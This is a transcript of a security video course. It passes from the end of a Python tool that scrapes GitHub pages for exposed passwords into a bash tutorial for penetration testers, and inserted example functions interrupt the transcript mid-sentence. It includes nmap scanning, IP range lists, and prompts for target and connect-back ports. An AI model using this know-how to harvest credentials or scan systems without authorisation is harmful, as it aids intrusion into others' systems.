we're getting this error here because we need to put this inside of our string so if we print this now it'll tell us it found the password and it'll give us the page to go to right here to check and see what is the context of this password now to finish off our tool so that way we can scrape any page on GitHub that we want remembering that we have to get to the page 
like this we can go ahead and copy this and we're going to make an input and we're going to name our input scrape scrape just like this and we will say equals and we're going to make this an input and we're going to say what page would would you like to scrape just like this question mark space and now this scrape we're going to pass into our driver.get right here so we will to pass in scrape and we're going to make this an F string and we'll say scrape and then we'll highlight it put it inside curly braces and now when we run this it should ask us for an input what page would you like to scrape and then we put in our page making sure we remember the https and now when we run this it should run the page for us and now you can run it against other repos and it is a complete tool for you if you have any suggestions on a tool that you think we should build next that shouldn't be too difficult for us as we are just learning python please let me know down in the comments and if you have made it this far in the video please like And subscribe welcome to my crash course on bash this is not a complete course I am currently working on a complete course in bash for hackers that is going to be really comprehensive and more focused on if you want to learn how to become a bash programmer or how bash programming works if you were to work in a company and you needed to know the bash language this course is specifically for those who want to be able to modify exploits and be able to Be an Effective penetration tester or ethical hacker and know the bash language well enough that you can modify exploits and maybe even write some of your own scripts so that you can accomplish all your purposes in The Bash world I know that is hard to believe you can do in the short span of 45 minutes but that is the goal of this course so if you are interested in the more advanced course it is coming and you are welcome to subscribe and wait for that course to come out but in the meantime enjoy this 
one.

All right, welcome to our bash scripting course. We're going to start off by downloading Visual Studio Code. A lot of people like to write bash scripts in nano, gedit or vim, but I don't think that's very useful for you as a beginner, because we're going to use a few plugins that we can install in Visual Studio Code. Go to the link in the description, click Download, and if the download doesn't start, click Save. I have already installed it, so I'm not going to download it again; it will sit in your Downloads folder when it's done. Then you install the package from your terminal: `cd` into Downloads, `ls` to see the file, type the install command and hit Enter. It might take about 30 seconds. If your file isn't named exactly the same as mine, type `sudo apt install ./code` and hit Tab, and the shell autocompletes the rest of the file name so you don't have to type all the version numbers.

Once that has installed, open the application menu, type in Visual Studio Code and launch it. This is where we're going to write our code. Now for the plugins: open the Extensions bar on the side, search for ShellCheck and install the top result (I already have it installed, so you'll see Install where I see Uninstall).
Then install shell-format, then Shellman, then Bash Debug. Now our editor is ready for us to open a file. We'll make a folder on the desktop: back in the terminal, `cd Desktop`, `mkdir bash`, then actually rename it with `mv bash bash_scripts`. `ls` shows `bash_scripts`, `cd` into it and `touch file.sh`. We'll create a bunch of different files as we write programs; this one is just to get started. In VS Code, open the whole `bash_scripts` folder so the file shows up.

To start the file, type `bash` and hit Enter, and the plugin gives us a shebang. Without going into too much detail, instead of the default the plugin inserts, `#!/usr/bin/env bash`, we're going to use `#!/bin/bash`. You'll see this one a lot, and I don't want to confuse you with environment variables; if you want, you can go read about why one is chosen over the other. Then, to make sure everything works, type `echo "hello world"`, save with Ctrl+S (Cmd+S on a Mac), come down to the terminal in the `bash_scripts` folder, `ls` to confirm the file is there, and run `bash file.sh`. It prints
hello world, so we know everything is up and running.

Let's cover a few things we've typed. The `#!` at the top is a hash and an exclamation point, also called a "bang", which is where the name shebang comes from. It tells the Linux machine that when this file is executed it should be run by bash, so everything after it is interpreted as bash. Then we have `echo`: if you're familiar with Python, it's the equivalent of `print("hello world")`, which is why "hello world" appears at the bottom when we run the script.

A couple of other things will help as you make notes: sometimes you'll write a script and not remember what `echo` does, so you can add a comment. On a Mac you press Ctrl and the slash key to comment a line. Anything on a commented line, for example `# echo will print the text`, is ignored when the script runs, no matter how many commented lines you have. So when we run this again it still just says hello world.

Now that we have a basic understanding of what's on the screen, let's move on. The first place to start is variables. Variables store data. We'll name ours `var`, because it's simple to understand that it's a variable, and the value goes inside quotation marks because it's going to represent a
string, and you can put your name in there. If I put in `var="Ryan"`, think of the variable as holding my name. To print the variable rather than the literal text, we put a dollar sign in front: `echo "hello $var"`. Open a new terminal, run `bash file.sh`, and it says hello Ryan. This seems really simple, but you will need variables constantly; they are used all the time in programming.

Right now you might think, why wouldn't I just type Ryan? The reason is that you may need to take an input later on; we'll do that, but for now we'll set it by hand. We could put an IP address in the variable (I'm not going to put a real one in for the sake of this video). Then below it you can type `nmap -A -p- $var -v`, with `-v` for verbose, and where we'd normally put the IP address we use the variable. If the variable held 10.10.10.10
and we ran this, it would start scanning that host, and you can see the scan start. Variables matter because later we could build a complete recon tool: ask the user what IP address they'd like to scan, store whatever they type in a variable, and run nmap against it. You'll see this all the time in exploits you pull from Exploit-DB: they ask for inputs, store them in variables, and in the future you may need to modify them. So that is a variable, a very simple version of one.

One of the reasons I struggle with bash is how it handles things other languages do with functions. In Python, if someone enters their name and we want it in all caps, we'd just add `.upper()` or `.lower()` to the value. In bash it's a little different. With `name="ryan"`, `echo "${name}"` prints my name (I notice this is supposed to say name). To capitalize just the first letter we use `${name^}`; to get all caps we need a double caret, `${name^^}` (I forgot to save the first time); and for all lowercase it's two commas, `${name,,}`. These expansions need bash 4 or newer. If we don't cover something in this class, you may have to Google the exact syntax, but this is really helpful, because a lot of bash scripting requires all lowercase or all uppercase. For example, when you run against an Active Directory name, you
will often find the domain is in all caps, and you can use the double caret like this in a script so you don't have to type it that way. That's an example of when you'd want something like this in the world of hacking.

There are a couple of other useful things. If we put a hash inside the braces, `${#name}`, save and run, we get the length of the value: the number of characters, not a word count. We can use this later, for instance to check the length of something read from a list. Lastly, we'll need a way to grab part of a string, for example numbers out of it. Instead of `name`, let's set `num="0123456789"`; we start at zero because bash, like most programming languages, counts from zero. If we `echo "${num}"` we get the whole string of numbers, but to grab a slice we use `${num:offset:length}`: the variable, then the offset (how many characters over to start), then the length (how many characters to take, not the position to stop at). So `${num:1:2}` grabs "12": offset 1 skips the zero, and length 2 takes the next two characters. Likewise, to grab the 2 and the 3 you'd say `${num:2:2}`.
Save and run, and we get 23. Just remember that in programming computers start at zero, so the character in position one is our second character. I hope that makes sense; go ahead and practice grabbing numbers out of this string. You can also use a negative offset, but you have to have a space after the colon: `${num: -4:2}` goes back four characters from the end and then grabs the next two, so we get a separate set of numbers. I use this every now and then; it's not super common, but it's worth keeping in your back pocket.

I also want to show you that we can save the output of commands in variables and then use them in our scripts; this will be helpful in the future. You're probably familiar with typing `pwd` in the terminal to see your present working directory. We can capture that with command substitution: `curdir=$(pwd)`. If we `echo "${curdir}"`, save and run, we get our present working directory. Another example: `time=$(date)`, and then we `echo` a message before the variable, say "the current time is", and this
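Here is an added example, not code from the course, that puts the expansions above into small functions you can run as they are: case conversion for an Active Directory realm, character counts, offset/length slicing with and without a negative offset, and command substitution. The domain and IP values are made up for the example, and `scan_header` assumes a `date` command that accepts `-u` and a format string.

```bash
#!/usr/bin/env bash
# Added example (not from the course): bash parameter expansion and
# command substitution applied to the kind of values a recon script sees.
# Needs bash 4 or newer for ${var^^} and ${var,,}.

# Normalise a domain the way a Kerberos/AD realm expects it: all caps.
to_realm() {
    local domain="$1"
    printf '%s\n' "${domain^^}"    # ${var^^} upper-cases every character
}

# The opposite direction: hostnames are matched case-insensitively, so
# store them lower-cased to avoid duplicate entries in a target list.
to_hostname() {
    printf '%s\n' "${1,,}"         # ${var,,} lower-cases every character
}

# ${#var} is the number of characters, not the number of words.
str_len() {
    printf '%s\n' "${#1}"
}

# ${var:offset:length}: offset is zero-based, length is a COUNT of
# characters to take, not the index to stop at.
substr() {
    local s="$1" off="$2" len="$3"
    printf '%s\n' "${s:$off:$len}"
}

# A negative offset counts back from the end. The space before the minus
# sign is mandatory; without it bash reads ":-" as "use default value".
from_end() {
    local s="$1" back="$2" len="$3"
    printf '%s\n' "${s: -$back:$len}"
}

# Command substitution stores a command's output in a variable.
# Assumption: date supports -u and a format string (GNU and BSD do).
scan_header() {
    local target="$1"
    local stamp
    stamp=$(date -u +%Y-%m-%dT%H:%M:%SZ)
    printf 'scan of %s started at %s from %s\n' "$target" "$stamp" "$(pwd)"
}

# Demo values (made up for the example)
to_realm corp.local            # CORP.LOCAL
to_hostname DC01.CORP.LOCAL    # dc01.corp.local
str_len 10.10.10.10            # 11
substr 0123456789 1 2          # 12
from_end 0123456789 4 2        # 67
scan_header 10.10.10.10
```

Each function prints its result rather than setting a global, so you can use it in a command substitution (`realm=$(to_realm "$domain")`) exactly the way `$(pwd)` is used above.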
is going to give us our time and date. When we save and run, it tells us we messed up, because we didn't write `$time` in the echo; we fix that, save, and now it prints the current time, Saturday June 4th, with the time. That's how we save command output in variables, and it will be helpful whenever we write scripts that use commands already on our Linux machine.

From here we're going to move into working with numbers. Numbers matter when dealing with things like IP addresses, or when you want to generate a wordlist for a fuzzer with numbers on the end. We're going to add numbers together and use a sequence of numbers to grab a range of IP addresses, or possibly make a password list. In bash this is a little different from other languages. You can comment out the block we've already written or delete it like I'm going to; save it as notes if you want.

Within bash, if we write `x=4` and `y=8` as in other languages and want to add them, it requires a slightly different syntax than you might expect: `echo "$(( $x + $y ))"`, a dollar sign and double parentheses. Save and run, and we get 12. Inside the double parentheses you don't actually need the dollar signs, so `$(( x + y ))` still gives 12. This also works with minus, divide and other operators. If we divide, `$(( x / y ))`, we get 0, which is right, because 8 doesn't go into 4 and
bash arithmetic is integer only, so the fractional part is dropped. Negative results are fine, though: `$(( x - y ))` gives -4 and `$(( y - x ))` gives 4. If you want decimals, you have to use `bc`, the command line calculator; I'm not going to cover it in this course. I'd rather tell you to just use a calculator, because it's easier than doing that kind of math on the command line.

So that's how we use variables and numbers in bash, but where it becomes useful is when we want to create a list of numbers. If we write `echo month{1..12}`, with the curly braces, it prints month1 month2 month3 and so on; save it and you see the output. This may not seem useful for hacking, but say we have an IP address and want a list to scan against, maybe in a tool that takes an IP and a range as input. With a /24 subnet we'd write `echo 10.10.10.{1..255}` (I forgot the dot the first time), save, run, and we have the complete range of IP addresses for our subnet. So this is a helpful way to append numbers to something preceding them. I don't use it a whole lot, but it's good to know it's available.

Now I want to cover something called special parameters, because you'll run into it in the world of cyber security. We'll clear this and comment the previous block out. The reason you'll run into it is when you run a tool or an exploit that requires
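An added example, not from the course, for the arithmetic and range material: it shows the negative and integer-division results, hands one division to `bc` for decimals (assumption: `bc` is installed), and generates IP and wordlist ranges. It also goes one step beyond the video: brace expansion only works with literal numbers, so `{$first..$last}` does nothing when the bounds come from variables or user input, and the range functions use `seq` instead. The prefix and suffix values are made up.

```bash
#!/usr/bin/env bash
# Added example (not from the course): integer arithmetic and number
# ranges in bash, plus the gotchas the course's examples run into.

# $(( )) is integer arithmetic: negative results are fine, decimals are not.
sub()     { echo "$(( $1 - $2 ))"; }   # 4 8 -> -4
int_div() { echo "$(( $1 / $2 ))"; }   # 4 8 -> 0, the fraction is dropped

# For decimals hand the expression to bc (assumption: bc is installed).
real_div() { printf 'scale=2; %s / %s\n' "$1" "$2" | bc; }   # 4 8 -> .50

# Brace expansion works with literal bounds only.
month_list() { echo month{1..12}; }

# {$first..$last} does NOT expand, so when the bounds are variables
# (user input, script arguments) use seq instead.
ip_range() {
    local prefix="$1" first="$2" last="$3"
    local i
    for i in $(seq "$first" "$last"); do
        printf '%s.%s\n' "$prefix" "$i"
    done
}

# Append a numeric suffix to a base word: Summer2023, Summer2024, ...
suffix_list() {
    local word="$1" first="$2" last="$3"
    local n
    for n in $(seq "$first" "$last"); do
        printf '%s%s\n' "$word" "$n"
    done
}

# Command substitution and arithmetic together: how many hosts are in
# the generated /24 list (254 usable addresses, .1 to .254).
count_hosts() { ip_range "$1" 1 254 | wc -l | tr -d ' '; }

# Demo (values made up for the example)
sub 4 8
int_div 4 8
month_list
ip_range 10.10.10 1 3
suffix_list Summer 2023 2025
count_hosts 10.10.10
```

If you pipe `ip_range` into a file, that file is ready to hand to `nmap -iL`; the same `seq` pattern is what you reach for whenever the bounds arrive in a variable.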
input from the user, say an IP address to attack and a port to connect back on, and it tells you that you didn't enter everything required. An example: we write `if [[ $# -ne 2 ]]`, and `$#` is the special parameter that holds the number of arguments, so this checks that the user gave exactly two inputs when they ran the file. After the `if` comes `then`, and indented under it we `echo "Need more parameters"` and `echo "Usage: requires two"`, then `exit 1`, which means we exited with an error. Bash closes the block with `fi` rather than a brace or indentation like Python (bash has `else` and `elif` too; `fi` is what ends the whole `if`). After adding the spaces inside the brackets, save it and run. If we run it with no arguments, it tells us we need more parameters; if we run it with `1 2`, two inputs from us, it gives no issues. We could have it print "script worked", but we'll leave it so you can see there's no error exit; it needs two inputs to execute.

This looks really scary, but what I wanted you to see is the special parameter that tells the script it needs two inputs from the user in order to run. Special parameters are one of those things I would, unusually, suggest memorizing with flash cards. Normally in programming and security you'd just say, I know there's a way to use a dollar sign to get the inputs from a user, and later when I run
into it I can Google how to do it. That saves a lot of time memorizing things you'll rarely use and will forget. But it's important to know this exists, because in the future you may run into an old exploit that has something like this, and an option has been deprecated in the version you're running against, so you need to drop one of the parameters. Now you know you can come in and change the count: if it required four and now only needs three, change the 4 to a 3 and run the exploit as you need. That's why I suggest remembering that `$#` has this specific meaning; you may need to modify it.

We're going to ignore the if statement for now and look at a different way to take input from the user: the `read` command. We can write `read IP PORT` to ask for an IP address and a port number. Then we `echo "The target IP is ${IP}"` and `echo "The connection port is ${PORT}"`, with the variable in curly braces. One thing you'll notice is that the variable isn't highlighted if you used single quotes, and the reason is that single quotes turn off every special character inside a string, so `$IP` stays literal, whereas double quotes
still expand the variables. That's something to note for the future. Save and run: the script waits at a prompt; we type 10.10.10.10, a space (which moves us on to the second variable), 4444 for the port to connect back on, hit Enter, and it prints the target IP and the connection port.

There's a better way to do this. Delete the port from the first `read` and add `-p`, which shows the user a prompt: `read -p "Input the target IP: " IP`, then `read -p "Input the connection port: " PORT`. Save and run again: it prompts for the IP, we hit Enter, it asks for the port, we enter it, and it prints the target IP and the target port. This is how you take input, and I like it a lot better because it's user friendly and easy to read. This way the user can't skip an input as easily, and if they give an empty input for the port we can catch it with an if statement, which we'll cover in the coming section.

Before we move into if statements and loops, we need to understand conditional operators. We'll comment out the code above (I hit the wrong button) and look at these: `-eq` is equal to, `-ne` is not equal to, `-gt` is greater than (I'll comment this out so the editor stops suggesting things), then `-lt`
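An added example, not from the course, that turns the `$#` check and the `read -p` prompts into functions you can test: `check_args` prints the usage line and returns 1 instead of exiting, so the caller decides what to do, and `ask` keeps prompting until the answer passes a validation function, which is how you catch the empty port input mentioned above. The IP and port checks are my own assumptions about what "valid" means here, and the script name in the usage line is whatever `$0` happens to be.

```bash
#!/usr/bin/env bash
# Added example (not from the course): argument counting with $# and
# input validation for the values a connect-back style script takes.

# $# is the number of positional parameters; $1 and $2 are their values.
# Return 1 rather than exit 1 so the function can be tested and reused;
# the top-level script is the one that should decide to exit.
check_args() {
    if [[ $# -ne 2 ]]; then
        echo "Usage: $0 <target-ip> <port>" >&2
        return 1
    fi
    return 0
}

# Assumption: "valid IP" means four dotted decimal octets, each 0-255.
valid_ip() {
    local ip="$1" a b c d octet
    [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] || return 1
    IFS=. read -r a b c d <<< "$ip"
    for octet in "$a" "$b" "$c" "$d"; do
        # 10# forces decimal so "010" is not read as octal
        (( 10#$octet <= 255 )) || return 1
    done
    return 0
}

# Assumption: "valid port" means an integer from 1 to 65535.
valid_port() {
    [[ $1 =~ ^[0-9]+$ ]] && (( 10#$1 >= 1 && 10#$1 <= 65535 ))
}

# Prompt until the answer passes the check. read -p prints the prompt
# (to stderr, so command substitution still captures the value); an
# empty answer, just pressing Enter, is rejected and asked again.
ask() {
    local prompt="$1" check="$2" value
    while true; do
        read -r -p "$prompt" value
        if [[ -n $value ]] && "$check" "$value"; then
            printf '%s\n' "$value"
            return 0
        fi
        echo "invalid value, try again" >&2
    done
}

# Interactive usage (commented out so the file runs non-interactively):
#   if ! check_args "$@"; then
#       target=$(ask "Input the target IP: " valid_ip)
#       port=$(ask "Input the connection port: " valid_port)
#   else
#       target=$1; port=$2
#   fi
#   echo "The target IP is ${target}, the connection port is ${port}"
```

With this shape the script accepts either two arguments on the command line or, when they are missing, falls back to prompting, and in both paths a bad value never reaches the command that uses it.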
which is less than, `-ge` which is greater than or equal to (probably the one we'll use most), and `-le` which is less than or equal to. These are really helpful in loops, so let's look at them in action. To write a test we put it in square brackets, and there has to be a space between the bracket and the first number: `[ 2 -eq 2 ]`. Then on the next line we `echo $?`. `$?` holds the exit status of the last command, which here acts like a boolean: 0 means the test was true and 1 means false. If you come from another language that looks backwards, but in bash success is zero. Save and run, and we get 0, because 2 is equal to 2. Change it to 3 and we get 1: the statement is false. It's really important to remember that `-eq` and the other dash operators only work with integers. We can also say not equal, `[ 3 -ne 2 ]`, and that returns 0 (true). `[ 3 -gt 2 ]` returns true, and `[ 3 -lt 2 ]` returns false. This will be helpful when we run loops in the future; you'll
going to see it and it's something to be aware of okay we can also look at conditional operations for Strings an example of this would be we'll uncomment this would be something like this so it will use an equals and we'll say the word word is equal to word and now if we save it and we run this we get it is false because I spelled it wrong save and we run it and we get a true so this this equals is used for Strings and if we want to say a not equals you put a bang in front of it or an exclamation point and then if we save and run this we will get a false because it says they're not equal but they really are equal so if we check take off the end of this word save it and we run they are not equal is true so this is helpful especially if you're running a script that you are looking for a specific keyword within a text that has been fed in through an input you can check to see if they are equal and then have it do something afterwards so now we're going to move on into if statement so we're going to see how this plays into writing our if statements statement off of what we already have here we'll just make this a word and we'll make this equal to and then the way if statements work is you start an if statement with if and you can also use and else but when you're done with the if statement you write in Phi just like this so we can do if this is true then do this portion of code else if it's not true do this portion of code and then when the script hits fee it will exit so if we come in here and we just say if word equals word we're going to tell it then we want it to do something so we can come down here and say Echo and we're going to use Echo a text and we'll tell it to Echo words match and then we can come down here and tell it else we can do an else and we can tell it to Echo a text and we'll tell it does not match just like this I accidentally clicked the debug but we're not going to mess with that right now and then we're going to close this off now if we save 
this come back to our terminal and we run the file it tells us the words match if we get rid of our D again and we save and we run this it says they do not match so this is how you can use a comparison with an if then else fee statement so if it is this then we want it to do a specific function and if not we then we can have it do something else this is a very basic if statement so I would challenge you to change this if statement and see if you can do and if the number two is equal to the number two then you want it to Echo the numbers match else they do not match and then do the same thing with a not equals and just work your way through these and see if you can play around with if statement and really grasp these Concepts and make them your own we are going to be moving on to while loops and we're going to cover these really quickly because we won't use these a whole lot but an example of when a while loop is used is in a buffer overflow when we want to crash a program we're going to send it so many bytes until it crashes and so the example is we're just going to say while the this is running we're going to send bytes to the server until it overflows so while Loops are used but I use them very infrequently I don't use them often I know there are other programmers out there who love while loops and use them all the time I would much rather use a for Loop so for that purpose we're going to cover while Loops really quickly so while we're in our file here we're going to write a while loop and we're going to use a really common while loop that is used pretty much in teaching while Loops no matter what the programming language is so if we take an input from the user like this and we say enter a number and then we do our colon space and then we're going to assign it a variable of num just like this and then we say while the condition which is going to be the num is we'll say less than 10 we want to do something so down here it tells us we need to enter and enter in 
what we want it to do so we want to Echo or call out the number for us every time the while loop runs and then down here we need to make sure that our number continues to go up so we'll say num equals dollar sign and down here we will need two sets of parentheses and we will say dollar sign num Plus one and the reason we're adding in this plus here is each time the while loop runs we're going to add one to the number and so the First Time The Loop runs let's say we enter the number zero it will run through the while loop and then when it hits this line of code it'll be zero plus one the second time it runs through this Loop of code it'll be one plus one which is two and then two plus one is three every time it runs it's changing this variable so what we are going to do is save this and run it we'll run it a couple of different times so you can see how this works so let's say we enter 0 as our number I have an LS here and that is not it it is a less than which is an LT so we'll save this run it and our number is zero and it shows us it runs one two three four five six all the way down and remember that it starts here at one two three and here we go so it runs for us from zero all the way to ten now if we run it again and let's say we put in the number eight it only runs twice because nine when it hits ten when the number equals ten it is no longer less than 10. 
so now that we see how the while loop runs we can also do something like this if we enter in a number that is already greater than the number 10 it will just exit the code because it is no longer a less than so this is an example of how a while loop runs over and over and over until the statement up here is no longer true now I would challenge you to use this with a greater than and maybe change this to a minus and see if you can use an input of a number and say that you need this to be as long as the number is greater than 10 you want it to do this and then you're going to minus one and so you can kind of play around with a while loop and get an understanding of how it works all right I have typed out a for Loop here for us and this is a very basic for Loop so we have this for Loop here and four we have this 4 is how we're going to start at I which is going to be the variable which iterates through the list that we give it so we're saying 4i in this list of numbers we want it to do something and we want it to Echo out the variable I every time this Loop runs so the First Time The Loop runs I will equal 1 the second time it runs we'll put a 2 in here the I will equal to the third time it runs it's going to equal 3 and so on so if we save this and we run this file you can see I Echoes out one two three four five and so on so every time we use something like this and so this is the for Loop and you can play around with the for Loop in a lot of different ways and even use these to Loop through lists or arrays in order to get it to print but the point of this course is not for us to learn how to program with for Loops but rather understand them and know how to edit them as we go through our cyber security Journey remembering that the point of us being able to understand bash is not to be bash programmers but in order for us to know how to manipulate bash scripts that are already written as well as bash exploits so when you see a for Loop like this you now know how you 
can edit it and change it and if you need to you can write simple bash for script for loops and loop through different arrays and lists
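As an added example (not the course's own script), here is one bash script that puts these pieces together: the read -p prompts, the integer comparison operators, an if/else/fi that rejects the empty port input the course warns about before it ever reaches -lt or -ge, a while loop that counts up to 10 the same way the course's loop does, and a for loop over a list. The function names valid_port, count_from and filter_ports are my own.

```shell
#!/bin/bash
# Added example, not the course's script. Function names are my own.
# Return 0 (bash "true") when $1 is a non-empty integer from 1 to 65535.
# An empty answer to read -p is checked first with -z, because
# [ "" -lt 10 ] is exactly the error the course warns about.
valid_port() {
    port=$1
    if [ -z "$port" ]; then
        echo "error: port is empty" >&2
        return 1
    fi
    case $port in
        *[!0-9]*) echo "error: '$port' is not a number" >&2; return 1 ;;
    esac
    # -ge and -le only work on integers; the case above guarantees that
    if [ "$port" -ge 1 ] && [ "$port" -le 65535 ]; then
        return 0
    fi
    echo "error: $port is out of range" >&2
    return 1
}

# While loop: echo $1, $1+1, ... for as long as the value is less than 10.
count_from() {
    n=$1
    while [ "$n" -lt 10 ]; do
        echo "$n"
        n=$((n + 1))
    done
}

# For loop: walk a list and keep only the entries that pass valid_port.
filter_ports() {
    for p in "$@"; do
        if valid_port "$p" 2>/dev/null; then
            echo "$p"
        fi
    done
}

# Interactive use as in the course, only when a terminal is attached.
if [ -t 0 ]; then
    read -p "Input the target IP: " ip
    read -p "Input the connection port: " port
    if valid_port "$port"; then echo "Target: $ip:$port"; else echo "Fix the port and rerun"; fi
fi
```

Entering 8 at the prompt of count_from prints 8 and 9 (two passes), entering 0 prints 0 through 9, and a number of 10 or more prints nothing, matching the runs described above.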
Info
Channel: PhD Security
Views: 326,805
Id: Rp69edBmFFo
Length: 680min 14sec (40814 seconds)
Published: Fri Oct 07 2022